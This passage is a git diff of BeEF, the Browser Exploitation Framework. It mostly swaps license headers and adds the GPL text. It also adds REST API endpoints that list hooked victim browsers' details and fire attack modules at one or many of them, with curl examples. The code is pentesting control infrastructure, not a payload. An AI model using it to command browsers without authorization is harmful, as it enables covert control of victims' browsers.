with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/rest/handlers/categories.rb b/core/main/rest/handlers/categories.rb new file mode 100644 index 000000000..88d5e8302 --- /dev/null +++ b/core/main/rest/handlers/categories.rb @@ -0,0 +1,39 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +module BeEF + module Core + module Rest + class Categories < BeEF::Core::Router::Router + + config = BeEF::Core::Configuration.instance + + before do + error 401 unless params[:token] == config.get('beef.api_token') + halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip) + headers 'Content-Type' => 'application/json; charset=UTF-8', + 'Pragma' => 'no-cache', + 'Cache-Control' => 'no-cache', + 'Expires' => '0' + end + + get '/' do + categories = BeEF::Modules::get_categories + cats = Array.new + i = 0 + # todo add sub-categories support! + categories.each do |category| + cat = {"id" => i, "name" => category} + cats << cat + i += 1 + end + cats.to_json + end + + end + end + end +end \ No newline at end of file diff --git a/core/main/rest/handlers/hookedbrowsers.rb b/core/main/rest/handlers/hookedbrowsers.rb index 6976dda05..f3384a6ca 100644 --- a/core/main/rest/handlers/hookedbrowsers.rb +++ b/core/main/rest/handlers/hookedbrowsers.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -30,12 +20,16 @@ module BeEF 'Expires' => '0' end + # # @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/ + # #get "/to/a/pub" # "BeER please" #end + # # @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...) + # get '/' do online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15))) offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15))) @@ -49,7 +43,9 @@ module BeEF output.to_json end + # # @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies) + # get '/:session' do hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session]) error 401 unless hb != nil @@ -76,11 +72,12 @@ module BeEF details = BeEF::Core::Models::BrowserDetails { + 'id' => hb.id, + 'session' => hb.session, 'name' => details.get(hb.session, 'BrowserName'), 'version' => details.get(hb.session, 'BrowserVersion'), 'os' => details.get(hb.session, 'OsName'), 'platform' => details.get(hb.session, 'SystemPlatform'), - 'session' => hb.session, 'ip' => hb.ip, 'domain' => details.get(hb.session, 'HostName'), 'port' => hb.port.to_s, diff --git a/core/main/rest/handlers/logs.rb b/core/main/rest/handlers/logs.rb index 848e1fd2e..6d7d4b109 100644 --- a/core/main/rest/handlers/logs.rb +++ b/core/main/rest/handlers/logs.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -30,13 +20,17 @@ module BeEF 'Expires' => '0' end + # # @note Get all global logs + # get '/' do logs = BeEF::Core::Models::Log.all() logs_to_json(logs) end + # # @note Get hooked browser logs + # get '/:session' do hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session]) error 401 unless hb != nil diff --git a/core/main/rest/handlers/modules.rb b/core/main/rest/handlers/modules.rb index 7addcf623..44384137e 100644 --- a/core/main/rest/handlers/modules.rb +++ b/core/main/rest/handlers/modules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -30,7 +20,9 @@ module BeEF 'Expires' => '0' end + # # @note Get all available and enabled modules (id, name, category) + # get '/' do mods = BeEF::Core::Models::CommandModule.all @@ -50,7 +42,18 @@ module BeEF mods_hash.to_json end + get '/search/:mod_name' do + mod = BeEF::Core::Models::CommandModule.first(:name => params[:mod_name]) + result = {} + if mod != nil + result = {'id' => mod.id} + end + result.to_json + end + + # # @note Get the module definition (info, options) + # get '/:mod_id' do cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id]) error 404 unless cmd != nil @@ -76,20 +79,29 @@ module BeEF #Content-Type: application/json; charset=UTF-8 # #{"date":"1331637093","data":"{\"data\":\"text=michele\"}"} + # get '/:session/:mod_id/:cmd_id' do hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session]) error 401 unless hb != nil cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id, :command_module_id => params[:mod_id], :id => params[:cmd_id]) error 404 unless cmd != nil - result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id) - error 404 unless result != nil - { - 'date' => result.date, - 'data' => result.data - }.to_json + results = BeEF::Core::Models::Result.all(:hooked_browser_id => hb.id, :command_id => cmd.id) + error 404 unless results != nil + + results_hash = {} + i = 0 + results.each do |result| + results_hash[i] = { + 'date' => result.date, + 'data' => result.data + } + i+=1 + end + results_hash.to_json end + # # @note Fire a new command module to the specified hooked browser. # Return the command_id of the executed module if it has been fired correctly. # Input must be specified in JSON format @@ -123,6 +135,7 @@ module BeEF #Content-Length: 35 # #{"success":"true","command_id":"not_available"} + # post '/:session/:mod_id' do hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session]) error 401 unless hb != nil @@ -141,6 +154,122 @@ module BeEF error 400 # Bad Request end end + + # + #@note Fire a new command module to multiple hooked browsers. + # Returns the command IDs of the launched module, or 0 if firing got issues. + # + # POST request body example (for modules that don't need parameters, just remove "mod_params") + # { + # "mod_id":1, + # "mod_params":{ + # "question":"are you hooked?" + # }, + # "hb_ids":[1,2] + # } + # + # response example: {"1":16,"2":17} + # + # curl example (alert module with custom text, 2 hooked browsers)): + # + #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}' + #-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633 + # + post '/multi_browser' do + request.body.rewind + begin + body = JSON.parse request.body.read + + modk = BeEF::Module.get_key_by_database_id body["mod_id"] + error 404 unless modk != nil + mod_params = [] + + if body["mod_params"] != nil + body["mod_params"].each{|k,v| + mod_params.push({'name' => k, 'value' => v}) + } + end + + hb_ids = body["hb_ids"] + results = Hash.new + hb_ids.each do |hb_id| + hb = BeEF::Core::Models::HookedBrowser.first(:id => hb_id) + if hb == nil + results[hb_id] = 0 + next + else + cmd_id = BeEF::Module.execute(modk, hb.session, mod_params) + results[hb_id] = cmd_id + end + end + results.to_json + rescue Exception => e + print_error "Invalid JSON input passed to endpoint /api/modules/multi" + error 400 # Bad Request + end + end + + # @note Fire multiple command modules to a single hooked browser. + # Returns the command IDs of the launched modules, or 0 if firing got issues. + # + # POST request body example (for modules that don't need parameters, just pass an empty JSON object like {} ) + #{ "hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj", + # "modules": [ + # { # test_return_long_string module with custom input + # "mod_id":99, + # "mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}] + # }, + # { # prompt_dialog module with custom input + # "mod_id":116, + # "mod_input":[{"question":"hooked?"}] + # }, + # { # alert_dialog module without input (using default input, if any) + # "mod_id":128, + # "mod_input":[] + # } + # ] + # } + # response example: {"99":7,"116":8,"128":0} # <- This means the alert_dialog had issues (see return value 0) + # + # curl example (test_return_long_string and prompt_dialog module with custom inputs)): + # + #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj", + # "modules":[{"mod_id":99,"mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]},{"mod_id":116,"mod_input":[{"question":"hooked?"}]},{"mod_id":128,"mod_input":[]}]}' + # -X POST http://127.0.0.1:3000/api/modules/multi_module?token=e640483ae9bca2eb904f003f27dd4bc83936eb92 + # + post '/multi_module' do + request.body.rewind + begin + body = JSON.parse request.body.read + hb = BeEF::Core::Models::HookedBrowser.first(:session => body["hb"]) + error 401 unless hb != nil + + results = Hash.new + if body["modules"] != nil + body["modules"].each{|mod| + mod_id = mod["mod_id"] + mod_k = BeEF::Module.get_key_by_database_id mod["mod_id"] + if mod_k == nil + results[mod_id] = 0 + next + else + mod_params = [] + mod["mod_input"].each{|input| + input.each{|k,v| + mod_params.push({'name' => k, 'value' => v}) + } + } + cmd_id = BeEF::Module.execute(mod_k, hb.session, mod_params) + results[mod_id] = cmd_id + end + } + end + results.to_json + rescue Exception => e + print_error "Invalid JSON input passed to endpoint /api/modules/multi" + error 400 # Bad Request + end + end end end end diff --git a/core/main/router/api.rb b/core/main/router/api.rb index 7bad31f33..3d2bc78d5 100644 --- a/core/main/router/api.rb +++ b/core/main/router/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/router/router.rb b/core/main/router/router.rb index e6ca7151b..958d29117 100644 --- a/core/main/router/router.rb +++ b/core/main/router/router.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/server.rb b/core/main/server.rb index d15ad9198..c0ddaee47 100644 --- a/core/main/server.rb +++ b/core/main/server.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -48,7 +38,8 @@ module BeEF 'beef_public' => @configuration.get('beef.http.public'), 'beef_public_port' => @configuration.get('beef.http.public_port'), 'beef_dns' => @configuration.get('beef.http.dns'), - 'beef_hook' => @configuration.get('beef.http.hook_file') + 'beef_hook' => @configuration.get('beef.http.hook_file'), + 'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http" } end @@ -61,9 +52,9 @@ module BeEF raise Exception::TypeError, '"url" needs to be a string' if not url.string? if args == nil - mounts[url] = http_handler_class + @mounts[url] = http_handler_class else - mounts[url] = http_handler_class, *args + @mounts[url] = http_handler_class, *args end print_debug("Server: mounted handler '#{url}'") end @@ -108,6 +99,13 @@ module BeEF @configuration.get('beef.http.host'), @configuration.get('beef.http.port'), @rack_app) + + if @configuration.get('beef.http.https.enable') == true + @http_server.ssl = true + @http_server.ssl_options = {:private_key_file => $root_dir + "/" + @configuration.get('beef.http.https.key'), + :cert_chain_file => $root_dir + "/" + @configuration.get('beef.http.https.cert'), + :verify_peer => false} + end end end diff --git a/core/module.rb b/core/module.rb index bb4fd29ed..4856008ef 100644 --- a/core/module.rb +++ b/core/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Module diff --git a/core/modules.rb b/core/modules.rb index 37d7ac953..5dff69520 100644 --- a/core/modules.rb +++ b/core/modules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Modules diff --git a/core/ruby.rb b/core/ruby.rb index d606555f9..b1d2f53f7 100644 --- a/core/ruby.rb +++ b/core/ruby.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # @note Patching Ruby Security diff --git a/core/ruby/hash.rb b/core/ruby/hash.rb index 1ee46bec0..f24b3f30d 100644 --- a/core/ruby/hash.rb +++ b/core/ruby/hash.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Hash diff --git a/core/ruby/module.rb b/core/ruby/module.rb index 7fa3d53d4..3eb170caa 100644 --- a/core/ruby/module.rb +++ b/core/ruby/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Module diff --git a/core/ruby/object.rb b/core/ruby/object.rb index da57bcfd9..98de6419b 100644 --- a/core/ruby/object.rb +++ b/core/ruby/object.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Object diff --git a/core/ruby/patches/dm-do-adapter/adapter.rb b/core/ruby/patches/dm-do-adapter/adapter.rb index 9d5d92a60..01117ab86 100644 --- a/core/ruby/patches/dm-do-adapter/adapter.rb +++ b/core/ruby/patches/dm-do-adapter/adapter.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # diff --git a/core/ruby/print.rb b/core/ruby/print.rb index 138809b0c..417fbcdf1 100644 --- a/core/ruby/print.rb +++ b/core/ruby/print.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Function used to print errors to the console diff --git a/core/ruby/security.rb b/core/ruby/security.rb index b3de1d769..34baa2813 100644 --- a/core/ruby/security.rb +++ b/core/ruby/security.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # @note Prevent exec from ever being used diff --git a/core/ruby/string.rb b/core/ruby/string.rb index 9f825ebab..7a83138d1 100644 --- a/core/ruby/string.rb +++ b/core/ruby/string.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class String diff --git a/core/settings.rb b/core/settings.rb index 0be0f6644..2230b7612 100644 --- a/core/settings.rb +++ b/core/settings.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Settings diff --git a/docs/COPYING b/docs/COPYING new file mode 100644 index 000000000..a6eac6ac6 --- /dev/null +++ b/docs/COPYING @@ -0,0 +1,348 @@ +COPYING -- Describes the terms under which the Browser Exploitation +Framework (BeEF) is distributed. A copy of the GNU General Public License +(GPL) is appended to this file. + +BeEF (Browser Exploitation Framework) is (C) 2006-2012 Wade Alcorn. + +This program is free software; you may redistribute and/or modify it under +the terms of the GNU General Public License as published by the Free +Software Foundation; Version 2 with the clarifications and exceptions +described below. This guarantees your right to use, modify, and +redistribute this software under certain conditions. If you wish to embed +BeEF technology into proprietary software, we sell alternative licenses +(contact wade@bindshell.net). + +Note that the GPL places important restrictions on "derived works", yet it +does not provide a detailed definition of that term. To avoid +misunderstandings, we interpret that term as broadly as copyright law +allows. For example, we consider an application to constitute a "derived +work" for the purpose of this license if it does any of the following: +* Integrates source code from BeEF. +* Reads or includes BeEF copyrighted hook, core components, tests, modules + or extensions. +* Executes BeEF and parses the results. +* Integrates/includes/aggregates BeEF into a proprietary executable + installer, such as those produced by InstallShield. +* Links to a library or executes a program that does any of the above + +The term "BeEF" should be taken to also include any portions or derived +works of BeEF. This list is not exclusive, but is meant to clarify our +interpretation of derived works with some common examples. Our +interpretation applies only to BeEF - we do not speak for other people's +GPL works. + +If you have any questions about the GPL licensing restrictions on using +BeEF in non-GPL works, we would be happy to help. As mentioned above, +we also offer alternative license to integrate BeEF into proprietary +applications and appliances. + +If you received these files with a written license agreement or contract +stating terms other than the terms above, then that alternative license +agreement takes precedence over these comments. + +Source is provided to this software because we believe users have a right +to know exactly what a program is going to do before they run it. + +Source code also allows you to fix bugs and add new features. You are +highly encouraged to send your changes to wade@bindshell.net for possible +incorporation into the main distribution. By sending these changes to the +BeEF developers, to the mailing lists, or via Git pull request, checking +them into the BeEF source code repository, it is understood (unless you +specify otherwise) that you are offering the BeEF project the unlimited, +non-exclusive right to reuse, modify, and relicense the code. BeEF will +always be available Open Source, but this is important because the +inability to relicense code has caused devastating problems for other Free +Software projects (such as KDE and NASM). If you wish to specify special +license conditions of your contributions, just say so when you send them. + +This program is distributed in the hope that it will be useful, but +WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +General Public License v2.0 for more details at +http://www.gnu.org/licenses/gpl-2.0.html, or below + +**************************************************************************** + + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 